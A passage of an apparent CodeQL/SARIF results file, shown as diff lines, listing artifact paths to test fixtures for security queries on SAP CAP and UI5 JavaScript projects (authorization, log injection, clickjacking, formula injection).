"%SRCROOT%", - "index" : 28 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 29 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 30 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 31 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 32 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 33 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 34 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 35 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 36 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 37 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 38 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 39 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 40 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 41 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 42 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 43 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 44 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 45 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 46 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 47 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 48 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 49 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 50 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 51 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 52 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 53 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 54 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 55 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", - "uriBaseId" : "%SRCROOT%", - "index" : 56 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 57 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 58 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 59 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 60 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 61 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 62 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 63 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 64 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 65 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 66 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 67 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 68 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 69 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 70 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 71 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 72 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 73 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 74 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 75 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 76 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 77 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 78 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 79 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 80 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 81 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 82 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 83 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 84 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 85 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 86 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 87 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 88 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 89 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 90 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 91 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 92 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 93 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 94 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 95 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 96 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 97 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 98 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 99 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 100 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 102 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 104 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 105 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 110 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 111 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 112 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 116 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 117 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 118 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 119 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 120 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 121 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", - "uriBaseId" : "%SRCROOT%", - "index" : 123 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 124 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", - "uriBaseId" : "%SRCROOT%", - "index" : 125 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 126 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 127 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 128 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 129 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 130 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 131 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 132 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 133 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 134 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 135 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 137 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 139 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 140 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 141 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 142 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 143 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 144 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 147 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 148 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 149 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 151 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 152 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 153 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 156 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 157 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 158 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 160 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 161 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 162 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 164 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 165 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 168 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 169 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 170 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 173 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 174 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 177 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 178 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : 